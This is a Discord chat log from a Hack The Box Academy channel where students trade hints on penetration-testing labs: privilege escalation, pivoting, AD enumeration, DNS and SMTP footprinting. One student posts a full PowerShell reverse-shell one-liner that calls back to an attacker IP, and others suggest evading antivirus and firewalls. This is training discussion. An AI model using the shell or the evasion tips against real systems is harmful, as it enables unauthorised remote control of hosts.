#modules

SeImpersonatePrivilege [+] Named pipe listening... CreateProcessAsUser() failed. Error: 216

Is the SeImpersonate enabled?

Try whoami /priv

yes

what are the tools you've tried

Hey, I found the flag for the Bypassing Security Filters under the Web Attacks module, but I cant seem to submit it successfully . I've made sure to remove all leading and trailing white spaces

Edit: turned out to be an issue with my clipboard, and I submitting the flag from the previous exercise

I have tried JuicyPotato.exe, PrintSpoofer64.exe, RoguePotato.exe

juicy should work, did you specify a clsid?

I could not obtain the CLSID with my current privs

there is already a list in the repo

Which sysmon config file are you using? There should be one linked in the module that points you to a Github repo that hosts an example config.

This example config is there on the Target too. Use this.

Godpotato is better and lazy way imo

Glad to hear it. Keep it up 💪

Thanks for clarifying.

I could not find a list for 2019 Windows Server

Working locally on the target, but failed to obtain the reverse shell as the SYSTEM

Oh maybe try PowerShell base64 from revshell com

already did, its not working

Oh dang

if it works then use another way to get access other than a rev shell

think outside the box

Also you can run a binary as system maybe try to use beacon or msfvenom binary

Also try to use ports like 443 53 445 80 so of there is firewall rules it doesn't block ( I don't remember if AEN had that)

Section: https://academy.hackthebox.com/module/158/section/1434
@wise vault Do you happen to know what they're talking about here?

Or does anyone else know perhaps?

Is it referring to if we're trying to pivot from an internal machine that does not have a public facing IP address?

So when setting up server.py, do we need to configure it to have credentials for the NTLM authentication. Would appreciate if anyone can confirm my understanding. Thanks.

if I've read it right, the proxy server only allows connections after ntlm auth was successful. but you don't need to worry too much about this, ntlm is getting deprecated, let alone this kind of proxy, ive never seen one of those in the wild

guys please teach me how to hack

i dont know what to start

https://academy.hackthebox.com/module/details/77

thank u guys

sure thing

the web requests fundamental module is very good

Hello, I am new on these type of things so I didnt really get how can I use https://github.com/FSecureLABS/SharpGPOAbuse in windows, as it is not an exe file. Can anyone explain me how to do it? (it is not really necessary but I read it here https://academy.hackthebox.com/module/74/section/709)

I have a question?

Could it be possible to make your own labs instead using the attack box and target box of Hack the box?
Let say you enrolled at hack the box academy cpts?

Sure, you mean like setting up a homelab? Many of the modules/sections have suggested standing up your own server/service to experiment with dangerous settings.

I would argue it's crucial to play around as much as possible with the stuff.

Thanks for answering my question

Hello

The reason why I want to do this is because hack the box target box is very slow especially the windows target box. It really a burden to me slows down my studying.

In starting module or somewhere it tells you the prefered way is you creating your own VM machine. Then you just use the provided openvpn

Well, the trade off will be that standing up your own boxes will be a whole different thing that slows you down. You do learn a lot though. Also, you'll still have to go through the modules and use their boxes to answer the questions.

Schainy has good advice too. Using your own kali/whatever box + VPN is better than the pwnbox IMO.

Wanted to thank htb staff, that windows hosts on academy run pretty smooth now. Thanks for the improvement 🙂

What VPN are u using? I would recommend using TCP. For me it runs smooth recently, but was having the same issue before.

whats suspicious about this?

Also this is meant to be suspicious and it looks normal to me so

module ACTIVE DIRECTORY ENUMERATION & ATTACKS / Credentialed Enumeration - from Linux somebody: actually reprocuded the steps in the bloodhound section? ( i know you dont have to you can anser the question without)

RDP and SOCKS Tunneling with SocksOverRDP in this section when i extract socksoverrdp-server.zip the .dll file auto removed what the hack is this?

anyone please

@next bronze are you still there?

@fathom pendant

yeah it works fine

turn off real time protection in defender

already turned off

doesn't sound like it since it's getting deleted

did you guys also face this before

Could anyone possibly provide a nudge on the new broke auth skill assessment? I'm on the OTP part. I have brute forced for 4 and 5 digit 2FA codes and no luck. I have also checked the requests in burp to see any hidden redirects or html information.

i also dont know

i double checked now reset the machine

i was also not able to brute force it 😉

let see

Oh

can you show a screenshot of it disabled

ok

Does anyone know why the lab in module: ADVANCED XSS AND CSRF EXPLOITATION and in section: Misc CSRF Exploitation works differently in burps chromium vs Firefox?

I get 302 redirected when I try to access /profile.php and I cannot read flag, but in Firefox I can access it normally. I even tried restarting lab but I'm pretty confident now that it has something to do with chromium.

In walkthrough its says this "Students need to follow the redirects until they arrive at /profile.php?user=htb-stdnt, then go back to Firefox to view the page" but why I cant I view it in burps chromium?

Yeah different browsers react differently to various labs. it's been a while since i did that module, but i do recall some modules i had to use FF over Chrome

That is not real-time protection, that is virus and threat protection. disable real time protection and you won't have a problem.

In my notes I had 0 mentions about this, Im doing this module 2nd time. So maybe its some update then.

someone have done attacking common service module ? I have trouble with RDP

i dont get it, how can i see the graphs?

did you dump the zip file into bh?

yes

I've just completed the module if you have questions.

is that wrong?

Do a search for something then it should show up

do i need to do something at neo4j?

Neo4j is the underlying graph program. Bh runs alongside it and you log into Bh, then you can drag the data you get from sharp hound or bloodhound python into bh

Looks like the data is in there. Do a search for a user or the domain stuff should pop up inside bh

yes it appears something. thank you both 🙂 🙌
But I didn't get a graph as nice as the one in the example

ah yes thx. sorry total bloodhound beginner

are you still there?

We will need to transfer SocksOverRDPx64.zip or just the SocksOverRDP-Server.exe to 172.16.5.19. We can then start SocksOverRDP-Server.exe with Admin privileges. how is this possible ? systems have no connectivity. it should already be there 🥺 why HTB .....?

its really fu***** s***

Transfer from the first machine, to the second

i did that now can you help me

No

see please

Did you start cmd/powershell as admin?

am stuck on that line

how to copy

.exe to 172

Scroll up there's connection info on how to get to that host

Mstsc has a drive share option

You might need to click advanced options to select it

It's all about clicking around, or using Google

I hope all is the same situation as you.

i did that

its not accessible you mean to share it

Yes you can share a file location

Or use a billion ways to share files taught in the file sharing module

yep I have issue on attacking RDP

I tried to attack SAM, LSSAS with previous modules content but nothing, no hash

so idk what to do

You know what, I'm sorry, I completed 'footprinting common services' which at one point involved RDP and confused it with your question about 'attacking common services'. With your question out here though I'm sure someone can offer insight into your question. 🤦

no problem, thanks tho ^^

Hello, new here trying to learn ctf, but I stuck on flag command, any input for me please

what ?

wdym ?

Anyway if someone have a clue I'll be grateful :
I'm stuck at Attacking common services - attacking RDP at the 3rd question
I know what to do, but i’ve tried to attack SAM, LSSAS from Password Attack module, and I have found 0 hash, i don’t know what to try anymore, someone can help me please ?

Hello, I'm trying to connect to htb through a vpn on my vm. What password do I input after using ssh htb-student@[ipaddresshere]?

Nvm, figured it out

Alrighty. Thanks, Xre0uS.

Or not... does this step matter?

I have no clue what to put as the password

lol, idk if it was OSINT question but i found the flag, i don't think it was legit, I have no clue how to enum the hash tho

i did successfully

last one here

is there need to configure something for 172.16.6.155 except 127.0.0.1:1080 in proxifier

i did 127.0.0.1:1080 socks5

You configure proxifier in the first host

yes for 127 settings

Yep

is there need to configure more

Shouldn't be

or i should run it as admin

I mean yeah, run as admin

proxifier as admin i did then lauch mstsc.exe form cmd (as admin) then enter 172.16.6.155 but not working

failed

Are you entering the right ip?

And the right creds

enter right ip

All 3 hosts have different creds

yes

And you got the same popups as the examples?

Step 4 means open a new terminal

You can't run commands while the openvpn process is running

Opened it, but when i try to ssh i don’t know what password to put

Look at the questions

did i circle wrong step

no yeah that section

after opening a new terminal and using ssh

Above the questions should be a command to ssh to [ip] with username "htb-student" and password "insertpasswordhere"

is that the literal password or

Scroll all the way down

doesn’t say one

To where there's questions

yes

Above the first one should be an instruction

That contains username and password

yes

¯_(ツ)_/¯

hold on

Try resetting the target and doing the steps again

It helps to clarify what module you're working on

😢 i will lost all configs that i did from last 3 hours

no way

It shouldn't take 3 hours to re-set it up

Also 3 hours, the internal hosts could have silently died

i added time

¯_(ツ)_/¯

ok let me do something

Are the creds in the text somewhere

Often 'username:password' will be the format

Ah, sorry, I didn't think it mattered because it didn't seem module-specific 🥲 Getting Started --> Nibbles - Initial Foothold

Ah

That's why there's no instructions

Because it's an academy version of a box, which won't have the htb-student user

None that I can find

You need to follow the steps in the section

This is all to do with enumerating a web page

but can I do that without sshing in to the machine?

Yes

ahh ok sweet

It's hosting a web port on 80

All the nibbles sections are interconnected @vagrant osprey

🥺 i did this sh*********

completed

Congrats. In the future, please don't randomly ping me, I do try and sleep

thanks a loooooooooooooooooooooooootttttttttttttttttt! whenever i ping you i got my answer

sorry

The next time you randomly ping me, I will block you

got it 🙂

Alright thank you!

I'm not on-demand help

its ok cool down please

I'm telling you my boundaries :)

That's all

Gl; hh

what is it?

Good luck, happy hacking

❤️

Hello dear hackers,
https://academy.hackthebox.com/module/77/section/731
None of these options redirect to https://app.hackthebox.eu/profile/overview
All the options redirect to https://academy.hackthebox.eu *
Am I mistaken or is the course outdated ?

This section covers the UI on app.hackthebox.com so you need to be logged in and follow along there.

^

This section doesn't apply to academy

OK thanks for answer.
Is there any way to go to app subdomain from academy subdomain ?

Or should I treat those as different websites ?

They are separate websites

ok

You can 100% academy and still be "noob" in app

App progress is via active boxes and challenges

OK that's what I just figured

app is exercices and "real word" practice, academy is courses

👍

Hellow htb expert dudes. Anyone know how to setup openvpn on the target windows box ?

?

You don't run openvpn on the targets

Windows target box on cpts module slow as F.

You run openvpn on your system to connect to targets

Nope. I have problem with the Windows target box slow as F

There is no "cpts" module, can you be more specific what module you're doing

Did you try changing vpn regions, using tcp

Any module that had a windows box target

That's kinda agnostic of it being part of the CPTS path

Is Really sucks.. htb should fix this. Hope htb can read this and improve their service.

Message support whenever you're affected by it

Paying high amount of money. Not a joke

Support doesn't monitor the discord

Lots of people pay a decent amount of money

They have too.

No, they don't have to

https://help.hackthebox.com/en/articles/5986762-contacting-htb-support

HTB doesn't pay support staff to monitor the discord, occasionally one may be on the discord to chat with -- but that's few and far between

They have to hear their end users customer because that is how they make money.

They do. Just via their actual support methods and there's also now the /feedback command, that gets sent to HTB

But complaining on the discord literally does nothing

I'm telling you how to get in contact with someone that can help you on the HTB staff end

Ok thanks for your advice. Screw them up. Took my money and offer me bad service. Really disappointed.

it works fine for me ¯_(ツ)_/¯

I also gave you a couple quick and easy troubleshooting options

Change vpn regions, use the tcp download instead of udp download

I l hope that will work for my end but unfortunately is not. Thanks for your kindness.

then reach out to support ¯_(ツ)_/¯

As stated, support is here rarely

Been a few weeks in academy.htb.com, but first time using app.hackthebox.com
Unless I am mistaken, I am supposed to have spawned a PwnBox from which I should be able to hack the target machine...
But I don't find any way to actually see the VM or enter it, what am I missing ? 🤔

Top right

The app pwnbox is different from the academy one

And is time-limited for free users

2 hours for the lifetime of the account

The academy restrictions are:
Limited internet
One spawn per day

OK thanks, found it

You don't have to do an app machine rn btw

What if I have suscribed for 1 month in academy ? Does it work for app as well ? Or do I need two distinct suscriptions ?

Have you opened a ticket with Support?

#modules message

They are separate platforms

Well it seems I have to

No you don't

Progress on app and progress on academy are separate

You can stop the machine and close the pwnbox

Also for starting point machines they have their own section #starting-point

Where are you seeing it tell you to do a starting-point machine btw?

The page is asking me to give the root flag.
I don't understand how I would give it without actually connecting to the target machine ?
(I have read the PDF associated and the flag is shown but in an image so you can't copy/paste it)

That's completely separate from academy, and flags aren't static in labs, so you can't just copy/paste

I'm asking where in the academy page that you were on does it tell you to do starting point

Starting-point is not linked to academy progress

Anything on app.hackthebox.com/ will not be connected to academy.hackthebox.com/ in terms of progress

https://academy.hackthebox.com/module/77/section/732

That's a suggestion

Not a requirement

I thought it would make sense to do the Starting Point before actually doing the easy box

"Here are some ideas"

I got it, so if I want to do it aswell, I'll need to suscribe to app

Yes

But doing those is not a necessity

That checklist is just an example

Especially the battlegrounds one as no one really is on battlegrounds

If you're doing the cpts(pentester) path, you'll gain a lot of the skills along the way

OK so you believe the CPTS path contains enough practice ?

For cpts, yes

So I don't have to worry about app section ?

Thanks for your advice

It goes through the basics of footprinting and attacking basic services

It doesn't go too deep on the web end

interestingly enough the last section of AEN suggests to complete Starting Point

Hello, I try to use the academy and beat "Nibbles" but as soon as i input the right creds in the admin page, it wont load anymore

VPN or PwnBox?
If VPN, try a different endpoint.
Also restart your target.

vpn

Nibbles, not nipples

I switched the VPN now it works 😄 Free nipples i guess?

I'm just saying you mistyped the name

thank you ❤️

Hi

Little bit stuck on Web Services and API's module

Why am i getting permission denied in dcsync attack.

It sounds like you don't have permission to write to that directory

😂 Got it

Hello I am currently on the knowledge check of Getting Started. I was able to obtain the hash and crack it to now sit in the admin section of the web service. My question is: is it normal that the upload button is not working or is this on my end? Thanks

linux privesc skill assesment- stuck at flag2. esc from htb-student to tomcat. nothing seems to be working. user is not in sudoers. setuid does not popup anything worth for gtfobins

Yes, the upload button doesn't work, try researching more maybe plugin versions

Thanks for clarifying

Got it! Can upload now. Awesome

https://help.hackthebox.com/en/articles/5986762-contacting-htb-support

where do i spawn in my machine from HTB

i dont know why the spawn machine option has dissappeared

wdym disappeared? You clicked on it and the instance is starting up. It actually says so in your screenshot. Also it's better to ask here #starting-point

no i mean the option to be able to use the pwnbox, - my bad for phrasing it wrong

On the top right (next to your username) you can choose how to connect. From there choose Starting Point and then Pwnbox. Otherwise you can refer to this

As explained earlier; this is different from academy the upper right should show your pwnbox, but if you've already used your 2 hours, that's it

I am on the "Network Enumeration w/ Nmap" module on the final task "Firewall and IDS/IPS Evasion - Hard Lab". I have ran nmap with sudo privileges //syn scan and am only returning open ports 22, 80. Port 53 UDP is open, Port TCP//53 is filtered. I have tried -sV and -sC to try and enumerate the services but I am coming up short. I am running Nmap version 7.93. I have also tried to spoof my source port to port 53. Any guidance?

try use ncat

go back to the section before the easy lab

read the section at the end

Look for other ports

i think i got it.

thanks

Did you add -p-?

i did. I was missing a port tho on my initial. I apperciate it!

:D gl

can anyone help with linux priv esc skill assessment. stuck at flag2 hours now. not able to esclate. whta i have checked-

sudo - don't have sudo rights so cant run sudo -l too

setuid - none of the binaries have gtfo exploit. (if any of these is way then please tell, will dig deeper into this)

cron jobs- found a cronjob e2scrub_all

also checked for kernel based exploit. although sudo version is vulnerable. but as current user cannot perform sudoedit.

for anyone doing the windows server, "Dealing with End of Life Systems", I couldn't get my usual xfreerdp command to work so I used this instead:
xfreerdp /dynamic-resolution /compression-level:2 /u:htb-student /p:HTB_@cademy_stdnt! /v:IP /cert-ignore /sec:rdp

you'll kick yourself, this one is more straight forward than what you've been trying. have you found "where" the flag is yet?

I stuck in broken authentication-skill assessment any one have advice or tip?

I stuck in 2FA OTP

flag2 location yeah. cant pretend to be that user as even su is not working

not to sound like yoda, but you don't have to pretend to be that user, be that user!

thats where iam stuck at, esclating into that

what's the very first thing you do when you pop a shell on any machine?

(possibly second after whoami)

id,whoami

to check for groups

then sudo -l

ls

Perhaps

ok third hahhah

pwd

how does ls come into picture? i mean i cannot read bash-history too. if u dont mind can we talk in dm. a lot of spoilers can get dropped

ohh

Hi Everyone, I'm having difficulties understanding this paragraph

"Penetration Testers will configure reverse proxies on infected endpoints. The infected endpoint will listen on a port and send any client that connects to the port back to the attacker through the infected endpoint. This is useful to bypass firewalls or evade logging. Organizations may have IDS (Intrusion Detection Systems), watching external web requests. If the attacker gains access to the organization over SSH, a reverse proxy can send web requests through the SSH Tunnel and evade the IDS."

So would the reverse proxy be to receive a connection from inside the organization's network?

Also, does 'external web requests' means outgoing or incoming web requests?

Thanks brother, i overlooked it and gone straight to complex stuff

i guess its just saying attacker sets up a reverse shell on target, so that the connection initiates from victim which may not be detected. although even outgoing network is monitored in companies. and external web request means both ongoing and outgoing requests. in this case it says abouut incoming requests

essentially the attacker is clocking itself as being a reverse proxy on the compromised endpoint. Essentially listening in on the port of communication and relaying that info or connection back to the attacker. It evades the IDS/firewall due to the endpoint being trusted by the network and they don't know it's been compromised, plus all they would see is the encrypted SSH traffic, not the specific web requests.

Thankyou guys, I get it now, so it is relaying information back to attacker

gotcha

<@&861185840277487616> ^^^

?

It can be either, external just means outside the network

hey guys i need help w a reverse shell

i did everything but the netcat listener isn’t picking up the shell

Make sure you're using the right LHost

i’ve tried multiple ports

172.16 can't speak with 10.129

it’s supposed to be my own boxes tun0 address right ?

What section?

shells and payloads

reverse shell section

Then yes, lhost should be your tun0

If using metasploit

yeah that isn’t working

and i’m getting my payload from revshells so ik it’s correct

i’m not sure what else i’m missing

I suggest using the powershell payload from the section

And replacing the relevant ip and port

that was the first one i tried

that’s why i ended up going to revshells

It should work

but it’s the same one essentially

All you gotta do is replace the ip and port

lol i did

the shell works

the listener just isn’t catching

the code executes successfully

Then the shell isn't working

Copy your code here and wrap it in backticks
`like this`

‘powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('10.10.15.61', 777);$NetworkStream = $TCPClient.GetStream();$StreamWriter = New-Object IO.StreamWriter($NetworkStream);function WriteToStream ($String) {[byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0};$StreamWriter.Write($String + 'SHELL> ');$StreamWriter.Flush()}WriteToStream '';while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) {$Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1);$Output = try {Invoke-Expression $Command 2>&1 | Out-String} catch {$_ | Out-String}WriteToStream ($Output)}$StreamWriter.Close()"’

That's a quote, not backtick

ohhh sorry hold on

powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('10.10.15.61', 777);$NetworkStream = $TCPClient.GetStream();$StreamWriter = New-Object IO.StreamWriter($NetworkStream);function WriteToStream ($String) {[byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0};$StreamWriter.Write($String + 'SHELL> ');$StreamWriter.Flush()}WriteToStream '';while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) {$Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1);$Output = try {Invoke-Expression $Command 2>&1 | Out-String} catch {$_ | Out-String}WriteToStream ($Output)}$StreamWriter.Close()"

using sudo nc -lvnp 777 for the listener btw

Worked fine for me running from cmd

As stated in the section, run the given command from command prompt

where does it say that ?

the whole lesson has been in powershell

but i’ll try it

ofc it worked …

well thank you

srry to waste your time😭

Just above

"On the Windows target, open a command prompt & copy and paste this command"

are you sure you’re on the same section? mine literally does not say that …

mine says “Try running some standard windows command to practice a bit”

I'm fairly certain considering I'm staring at it

"Connect to the target via RDP and establish a reverse shell connection" is the question yeah?

yes

<@&861185840277487616> preemptive ping considering the names that are typing

Read just above the provided command that's the powershell -nop

okay i see it, thank you . so what is the difference between ps and cmd ??

This launches a powershell that will basically run in the background

I also believe cmd interprets things differently than ps

You know, it'd be much more benificial to you if you don't ask questions you could google, with all due respect, so called "google-fu" is probably the most useful skill you can acquire

It's not uncommon for people to ask silly simple questions here

¯_(ツ)_/¯

@rustic sage okay

In my country we have a saying that roughly translates to
"Give a man a fish and youll feed him for a day, give a man a finishing rod and youll feed him for life" i wanna give that man the fisging rod

And in my country bashing people for trying to learn is called being a dick

I just had pineapple pizza, and i LIKED it

"With all due respect" is a bit of an oxymoron

<@&861185840277487616> no need for that language my guy

Also I guess the language filter is broken or you're bypassing it in some cheeky way

You do realize they have logs yeah?

Bots log what something was said before it was edited

Yes, i do, i just dont want it to be so boring for the mods

Anyway see you in hell

Go have fun pleasuring yourself with a cactus

@rustic sage

can a mod or staff help

specfically with https://academy.hackthebox.com/module/39/section/415 i had to google the answers (the page thats suppose to load does not. the metasploit attack that should work does not as the page is broken.

this is a basics "metasploit" thing

?

I've had no issues with it in the past

el* exploit?

i have tried 4 victim machines

yes that one

i have pictures if you want me to pm them or w/e showing commands proof of solve at this point im doing it to learn but its not playing nice.

What exactly is it you're having issues with? You're properly backgrounding the shell yeah? Ctrl-z after it executes

And no, I'm not taking pms

You can follow #welcome to be able to post images

it will not load the page : so you cannot even find its el* then it will not run exploit

i do not really want to link accounts i only ask as its a picture i figured ya'll didnt want it here not that the answer is not easy to google

I'm running through it now to verify if it's a you issue or a lab issue

that's all i want ^^

Worked fine for me

Got both the expected exploit and the expected escalation working

You can just curl the page

Also make sure http:// not https

i did

It loaded just fine for me though

for me if i load its just solid white curious

Do you have a title in the html or is it just loading

nope nothing

just pops open then hangs

Then I suggest changing vpn regions and trying again

i'll be generic but

find (name)
set lhost
set rhost
use number
run
i get this msg >

exploit aborted due to failure: unexpected-reply: Upload was not successful
[*] Exploit completed, but no session was created.

Again; change vpn regions, download a new pack, respawn target, try again

ok

i'll give that a shot ty

Also curious; if you do ip a do you have multiple tun ips

Like tun0, tun1, tun...

If so, that could also be a cause

Also running pwnbox and your own vm can also be an issue

nope

its a bare metal kali fresh

Anyway

Staff doesn't monitor this chat

Your best bet if you want to reach staff is to use the support chat on the website

ok ty will do apprecate you =3

worked on the first try so was not a me thing ty again 😄 i was done in like 1 min max

Ye usually it's a 60/40 on skill issue/lab issue

Always keep in mind the basic troubleshooting and it's ez

https://academy.hackthebox.com/module/147/section/1335
The target is running a vulnerable version of sudo (1.8.3), so I attempted to use Metasploit's sudo Baron Samedit exploit. However, I never received the reverse shell. The exploit does indicate that it has completed, but nothing else happens. I have ensured that the exploit options are correct and that the shell session is compatible with the exploit.

If that was not taught throughout the module, then it is not the appropriate way to move forward

i have completed the lab the module way but was just wondering why won't the exploit work though

I had issues with that too, I moved on from it and will revisit later on, by memory a library issue was the reason?

ohh exploit does require a specific version of libc i think

I am trying to do pivoting.

Here is the scenario.

• I have my attack machine A, which is a Linux machine.
• From this attack box, I can access machine B which is also Linux machine.
• From machine B, I can access internal Windows machine C through RDP
• From machine C, I can access Windows machine D through RDP.

Now, I need to perform a nmap scan on machine D. The nmap tool is only present on the attack box A. I set up a chisel proxy server on C so that the traffic on 1080 port of B is tunneled dynamically to D through C. I also set up static port forwarding such that the traffic on 1080 port of A are forwarded 1080 port of B. I configured proxychains to route the traffic through 1080 port on A. I then used proxychains to run the nmap command as
proxychains nmap -sT -v -Pn --top-ports 20 D -oN D.nmap
I know for sure that RDP is running on D, but the scan shows the 3389 port as closed. How should I approach this situation?

What does your /etc/proxychains4.conf file say?

is it routing through port 9050 or 1080?

1080 localhost port

Ok so your 127.0.0.1 9050 is # out in your conf file?

Chisel server is running on the linux target

Im confused, it telnet just very unsafe since you can get in with any random password?

Yes

telnet is considered unsafe because it transmits in cleartext

No. Chisel server is running on Windows C. I connected to that server from Linux B from chisel client.

This creates a tunnel.

A=pwnbox/vm B=Ubuntu C=Windows D=DC, correct?

Yes

Ok, have you tried this as a reverse pivot with chisel?

"There may be scenarios where firewall rules restrict inbound connections to our compromised target. In such cases, we can use Chisel with the reverse option."

I tried this. But this is one more level of pivoting so not working

Which section is this one? Just so I can go back to it

This is not required by any of the exercises. I was just curious.

Right

I'm on the easy footprinting assessment lab

im watching a walkthrough on how the person got access to it using ftp

but the way he did it is weird, its like he knew the username ("ceil") and htb doesn't tell us how to enumerate usernames for ftp

and he didnt do it either, he just ran an nmap scan

and then he did ftp ceil@ip

Take a close look at the Nmap scan

okay 1 sec

my nmap scan

doesnt show the username anywhere

hi menace bunny

there are flags you can used with nmap to get you more info

this is the scan of the video...nowhere does it say "ceil"

I used -Pn -A and -T4

as well

Try || -sV||

okay let me try that, thanks

what are you trying?

I don't think there's much to be spoiled for that assessment

just the general techniques will do

yeah so just what you've tired will do

(Ceil's FTP) found it bruh

thanks

that's SA1 yeah? there no need for DACL abuse for that

do u know how I can get the password? 😅

Use the techniques from the module

which question is that for?

yeah which questin in that assessment

oh wait trust attack, my bad I saw assessment 1 and thought it's part 1 of the tier 2 AD module

ok dm

Hi guys, I managed to find the ftp user for a login but cant seem to find the password. In the video that I'm watching, the guy managed to enter the password from the nmap scan (evidentally) which is weird

There are no official videos. Maybe you should ask the person who made the video how they did it. If he doesn't explain it in the video.
I advise you to study the module again. Then you too will find a way to get the password.

okay cool, but do you mind nudging me in the right direction? 😅

i have ran this script

nmap --script ftp-brute -p 21 <target-ip>

but its been on that for like the past 20 mins

Was this shown in the module?

no but neither was how to get the passwords of a user in ftp was either im 90% certain

can someone pls help 😦

If it wasn't shown in the module, it's probably the wrong way 😉

im so confused, theres nothing in the module that shows us how to get the ftp password

turns out I can do that by chaining the proxies in proxychains configuration!

Read the text of the task again very carefully

Hello everyone,

I'm stuck at the question “What is the admin email address?” footprinting/imap-pop3

I logged on to robin, tried to read some mail, but no mail present.

I've been looking for a day

hi

am just stuck on @172.16.6.45 there is no rdp but i can ssh but creds of vfrank are not working for this

am on pivot final skill assessment

anyone who solved it

i can rdp to 6.25 i completed it

ok thx

smh bruh 😂 they were literally on the page

@normal sand hi are you there?

if im not mistaken i think u have to use nmap for that part

Can nmap detect e-mail addresses?

i think if u use the -a flag it should show something

hey guys have anyone finished the dacl II module ?

with NSE ?

cant remember how I did it

nah I never ran those...i usually use -Pn -A and -T4

but u gotta look at the info carefully

just look for the @ in the results

how to solve this , tried alot no idea

nevermind fixed it

anyone who completed pivoting module

Hey, I'm here now.

need help

What's up?

mate where are you on the pivot module?

can i dm

Section: Web Server Pivoting with Rpivot

Sure, but you're ahead of me atm.

am on final asses just stuck on one question

Ahh, it'll take me a while to get there. Been busy with life so got slowed down on the module progress.

keep it up mate

you will

@next bronze hi mate are you there

i think, i don't have to use nmap

maybe not...I cant remember how I did that 😅 but I think the answer was on the page (how to do it)

no prblm thx

@wise vault Can I DM you? Need some help.

sure

Module & Section: PIVOTING, TUNNELING, AND PORT FORWARDING - Web Server Pivoting with Rpivot

Using the concepts taught in this section, connect to the web server on the internal network. Submit the flag presented on the home page as the answer.
I'm on the home page and can't find the flag 💀 😑

I've tried using curl and went through the source code, still nothing.

I can DM someone a screenshot, can't send it here since it'll be a spoiler. Please lemme know if you can help with this.

It should work with curl, what command are you using?

anyone here know how to fix this type of issue?
When Pivoting
Tried doing the "proxychains nmap -sT <internal ip> -p 445"
result is the attached pic

But in the Module doing this command resulted in an open port
.
Currently Using a eu-vpn not pwnbox
Using a pwnbox also shows a result of an open port as well

disable ping when scanning through proxychains

shows filtered, err no way that i need to use evasion or stealth scan in here :<

I was trying the incorrect IP address. I was looking at the wrong web server. Thanks 😂

oh fair, I was also a bit confused by that for a bit since they did not put the ip address you need in the question

Yeah, and when I did a ping sweep, there were a ton of hosts that were up 😂

how can i get ip of Academy-ea-ms01 so that i can establish winrm session

pay attention to detail, it is under your nose

module - Attacking common services, why do we turn off smb in responder and how does ntlmrelayx relays credentials to other computer ?

instead of turning off smb in responder, we could just not run responder right because it was listening for SMB requests

hey guys!! am stuck at two questions. Please help me!!

1. Footprinting -> DNS
   Identify if its possible to perform a zone transfer and submit the TXT record as the answer. (Format: HTB{...))

2. Footprinting -> SMTP
   Enumerate the SMTP service even further and find the username that exists on the system. Submit it as the answer.
   I used smtp-user-enum -M VRFY -U footprinting-wordlist.txt -t <ip>

still it says 0 result what should I do?

You must perform a zone transfer of the subdomain

Identify the potential subdomain when you first perform zone transfer of inlanefreight.htb

i did tried axfr but its not happening

you will find subdomains like internal.inlanefreight.htb, ns.inlanefreight.htb, perform zone transfer on them

okay and wht abt smtp?

this should work since you are trying with the wordlist on resources, let me try

plz try and say am getting 0 results with the command i said

Hello, I need some information about
LINUX PRIVILEGE ESCALATION - Privileged Groups
As said in this part of the module, I looked for cron jobs in the syslog part. The job started as root could be modified so I did it. I am now root of the box and it looks like this was an unintended way of doing things as the flag is nowhere to be found and I can retrieve md5sum of flags from later sections of this module

Is there something I missed?

increase the timeout to 20 instead of using the default 5 seconds

smtp-user-enum -M VRFY -U footprinting-wordlist.txt -t 10.129.66.183 -T 20
WARNING: You specified a lone username or host AND a file of them. Continuing anyway...
ERROR: Can't open username file 20: No such file or directory
I got this error

rtfm. Incease timeout is not -T

Did you try with another user list?

If I remember well SMTP had this issue

Where you had to change userlist in order to find something

which another one?

I don't remember which one but can try SecLists/Usernames/xato-net-10-million-usernames.txt

okay let me try this

Or was there any user list in the module section ?

from my notes it is the right wordlist, I was having the same issue as well but increasing the timeout I was able to get the answer.

naah, it said to use the same worldlist from the resources, and am trying the same thing as @thorn hawk

thanks @thorn hawk it did worked.

Well the username is in the list, mb

no problem 👍

now will try of DNS too

can somebody explain this?

you need responder to poison the requests so that they will get redriected to your ip, but ntlmrelayx also need to be able to receive the requests to relay them

so we turn off so that we do not capture the credentials rather just listen for LLMNR query and relay that to ntlmrealyx which sets up a smb server?

kinda, ntlmrelayx is already listening, it just needs the requests to come in so that they can be relayed elsewhere

if responder is also running the smb server then it can't listen on the smb ports

I usually just start ntlmrelayx before responder so that I don't have to modify the config but YMMV

yeah thats correct, ntlmrelayx sets up a smb server itself and the module does not specify how to identify the hosts you can relay the credentials to

probably out of scope, there's always the ntlm relay module

alright, thank you :))

What is the FQDN of the host where the last octet ends with "x.x.x.203"?
Help me with this

@round moat use dig within the specific zone then grep the value

am not getting any output

Subdomains of Subdomains

i used dig @ip internal.inlanefreight.htb axfr and got certain ouput

but it doesnt have exact ip related to 203, the close one is
mail1.internal.inlanefreight.htb. 604800 IN A 10.129.18.200

Try using the showcased tool

Hey everyone

I have strange bug

Bring it up with support

If it's htb related

@fathom pendant should I go to support with this one

That's not a bug, you need to replace the port numbers with PORT

Also; spoiler so delete

Bro

PORT 53903

Spoiler

And I mean replace it with the literal word PORT

dnsenum --dnsserver 10.129.42.195 --enum -p 0 -s 0 -o subdomains.txt -f fierce-hostlist.txt internal.inlanefreight.htb
I tried this but still cant figure it out

AA thanks @fathom pendant

Just be patient and try all subdomains

Will try now anyways thx

The answer key doesn't know the port# that's spawned

Working you are wizzart

@fathom pendant thanks a lot

I mean

The hint I believe tells you

Yep it's a bit strange before we always use actually port

not hardcoded word PORT

will be reading hint more accuraty now

Well how would the answer know what random port gives the answer

The backend answer key isn't tied to the front end spawn

I think the VM wich i used from browsr

That. Doesn't matter

connected with backend

Interesting anyways will now it

The in-browser vm connects to the vpn, like you would with your own vm

yep I mean in general its connected

Loosely

because we can simply search the answer in google

The backend answers are hardcoded

Hmm okay I though not

anyways thanks

hey there I have a question: I'm working on this Windows Event Logs module and when I RDP into the machine to see the event logs, the machine is so zoomed in I can hardly do what I need to do. How can I make this easier to use?

change options on the rdp i guess

i use this alias alias xfreerdp='nohup >& /dev/null xfreerdp /w:1600 /h:900 /timeout:100000 /cert-ignore /drive:home,"/tmp/Temporary" +auto-reconnect'

no /dynamic-resolution?

